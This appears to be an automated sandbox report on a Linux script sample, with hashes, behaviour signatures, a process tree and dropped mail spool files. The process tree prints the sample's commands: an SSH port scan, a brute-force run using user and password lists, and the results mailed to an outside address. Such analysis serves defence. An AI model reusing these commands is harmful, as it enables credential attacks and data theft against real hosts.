285572a9f4a1050d435a6e328f1072f0a27be99b15e3024945ae5f9209999d8a

Analysis

max time kernel
23s
max time network
24s
platform
debian-9_mips
resource
debian9-mipsbe-20231215-en
resource tags

arch:mipsimage:debian9-mipsbe-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
22-12-2023 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.python/allb
Size

1KB
MD5

d8562d823f1531477aed56051c3e616a
SHA1

e5ddd1abb83d031082d713f3b7c8ecb3e19a53d0
SHA256

c96a2a632b23eb6849a539202f995431e9fd5def6cf9a5998419192e2ffb4671
SHA512

ad4b1108d0ff324ec74456ab4d84bfe4cdd2759808ef8fb92a446ace3c1d19956e95b2f8a0896824c13b6c662413dcf0ddb0ca6e333d4366a708f76cb4c87da0

Score

6^/10

Malware Config

Signatures

Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/sys/kernel/ngroups_max	exim4

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/muTJKEr9	mail
File opened for modification	/tmp/munOZl4s	mail

/tmp/.python/allb
/tmp/.python/allb
1⤵
PID:712
- /tmp/.python/c
  ./c 22 -b -i vmbr0 -s 10
  2⤵
  PID:719
- /bin/sleep
  sleep 2
  2⤵
  PID:720
- /tmp/.python/prg
  ./prg -I bios.txt -U user.txt -L pass.txt -o vuln.txt
  2⤵
  PID:731
- /bin/sleep
  sleep 5
  2⤵
  PID:732
- /bin/rm
  rm -rf bios.txt
  2⤵
  PID:745
- /bin/sleep
  sleep 1
  2⤵
  PID:746
- /bin/cat
  cat vuln.txt
  2⤵
  PID:756
- /bin/cat
  cat vuln.txt
  2⤵
  PID:758
- /usr/bin/mail
  mail -s python "[email protected]"
  2⤵
  - Writes file to tmp directory
  PID:759
- - /usr/sbin/sendmail
    /usr/sbin/sendmail -oi -f "root@debian9-mipsbe-20231215-en-13" -t
    3⤵
    - Reads runtime system information
    PID:762
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1rGYBd-0000CI-1j
      4⤵
      Reads CPU attributes
      PID:784
    - - /usr/sbin/exim4
        
        /usr/sbin/exim4 -t -oem -oi -f "<>" -E1rGYBd-0000CI-1j
        5⤵
        Reads runtime system information
        
        PID:785
      - /usr/sbin/exim4
        
        /usr/sbin/exim4 -Mc 1rGYBj-0000Cf-IC
        6⤵
        Reads CPU attributes
        
        PID:786

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/mail/user

Filesize
1KB

MD5
66c9aa6f47c31c1e97da445572d31145

SHA1
95f90e189037b11bff993944f3d5429c89f30106

SHA256
c2206505991e3ccc11b6624cf67cac54b37c944c6e8db2375b6f9e9cd9e09eff

SHA512
31037d0403ffd6f99268c225d9d802e0aaf9d56869306c0c499774ee843aba96efdab4a9bc177f4ac5a1b9e126a92c561b9639012e60a7d47e7b758d1a244e72

Download Submit
/var/spool/exim4/input/1rGYBd-0000CI-1j-D

Filesize
19B

MD5
dac63469f0b62d924acf7d615001fb48

SHA1
776f9a4a4f11f57afe1b5030e6ceb58c036f9969

SHA256
48d0db4e387de742ed673d987890261adc54d5a835175cb773ac991ad19461a1

SHA512
cff933d02bf4c6660c83bf4bf0167ecf0cac6ff77ab208549c8d1fc383da3fa80bfba97bee62fa47d2ee270982001e1e92a00035c1900dde297946ab603269a5

Download Submit
/var/spool/exim4/input/1rGYBj-0000Cf-IC-D

Filesize
1KB

MD5
663e89612a42cdbe4d29502664f25e68

SHA1
bf40bf00953e8ac7bd70f3985adc0ab032f95e0d

SHA256
50e5c0638cf16979d141dbc93c21ab6c8242b058d15b07827d6975302e6dc93a

SHA512
6e21c463c9142dfdc963c65b833730b00433d310715840e5517f2c32812c71efefba9125d7204e9b4ae25c1cd5a7ea0857062c652482c06bf1e1a119fd328ccc

Download Submit
/var/spool/exim4/input/1rGYBj-0000Cf-IC-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/hdr.762

Filesize
713B

MD5
263ca03d9a11cb2eaf92d56ea5f7eac2

SHA1
676000dd58cf308e69974d0781669c3014fec927

SHA256
bc6634af215849e03eb453ff2d11814c7673fdc5589a9f6c416994c1cf2c6447

SHA512
1c8f02c7637000b5f8a24ec6f5b07eed1bff7bdaf7b6f1cb68c1e160ef9bae04cd2cc84e70ed2c81eb86e477e113c62961e52a54f3d838e652cc912bba46033a

Download Submit
/var/spool/exim4/input/hdr.784

Filesize
729B

MD5
50731d2343b75a3ecfe21a4e092ba779

SHA1
20580958a606ce311456e343880aaeef68ee9686

SHA256
942eb0ec6bde1f8a5bea8b5032cf9c6b076f2a7c141e6d52cfa54e16548bda2c

SHA512
32678a8a90750fd02bb7dcb68383acf1aaa3906258bac674d2524099f8f80f8ad2168bb5d7d336e792ba227e3285dd7eadaff2c2327dcfcd2b381718876b28af

Download Submit
/var/spool/exim4/input/hdr.785

Filesize
954B

MD5
62fda3449078b7863f766c93427ba8c4

SHA1
4da425d25218ed55d8ade89cbf5d79628254d998

SHA256
61af1edf72645352cd5225e818026aa3c5ad03cf058f7f067cb6c6f818cf602c

SHA512
3d7eb939b265a4606a838004b0fc8a418b5c78837e7e96c803c750485a80d67df82f907c1fddcfb21026390d102519a7ce0547b73c9704725d73e62cc94cdbab

Download Submit
/var/spool/exim4/msglog/1rGYBd-0000CI-1j

Filesize
90B

MD5
9d14f536d0e2676e20e6dfe231276fbe

SHA1
3ac9386e7e2d2e2f7e322dae15102857d60f83c1

SHA256
1b2fad0d8bd2e353079d6abfa4f466c1a57cc7af223bca0c0a24161760644759

SHA512
3a8c245f58cca9f054dcb1050387bc5736661c1e31f6fc95c6bfd56136e80469bf36a88103fbb4af106040ffc0c814ebfc7c368ff86ba3c17f7f76f7f1e68cbf

Download Submit
/var/spool/exim4/msglog/1rGYBd-0000CI-1j

Filesize
178B

MD5
03e2e34b95af73d9d1c8f2736a7fb3e3

SHA1
249e857b190ef8fa7cf11a3c21d5672ad909257b

SHA256
8579705979c7748e23c859859623b98194a63fe84fb23ec02f57b1d71eaebb52

SHA512
0c6773d5316d487136edd37beef81c2a981c9052965c5154e9a723481a236840a428a5becb689cd29ea5882ed647e92eafb738d7ae6771ab6ca301a8dabe9b1f

Download Submit
/var/spool/exim4/msglog/1rGYBj-0000Cf-IC

Filesize
85B

MD5
37d4ad4574fa8229969924a5b75aff76

SHA1
6702f35b518eccde61be4e656ea13ec504809d65

SHA256
949dad4e0b0b6604da9ec0b449f7623bd820828da758758bdc8fb5b447533322

SHA512
dae8767aa852fb0bd00976e5077204fbb1b0268f8f99be1818cda6a8178e29c4c75ca75ffca9233f65b2c97510f977f1fb6a6f19265c0069811b34501ac56c45

Download Submit
/var/spool/exim4/msglog/1rGYBj-0000Cf-IC

Filesize
286B

MD5
dd4da547d2c6ce7548d8766e8ffab3c1

SHA1
336e1f74a00a7ddaf2e630e1e5e3a8b70bd9e600

SHA256
59cc063c16925a56466118b62994e99bf541ea8c54fd62b5d841d851dc55b7e4

SHA512
afe03174f1a64e65de964d2a4ada0cc46924e1267069a7bd2942c30534dc41d4321e479480a0658f6cbe4d0dfeebc53d49bb3e288a5f8b9dfbb724633ef2d7a9

Download Submit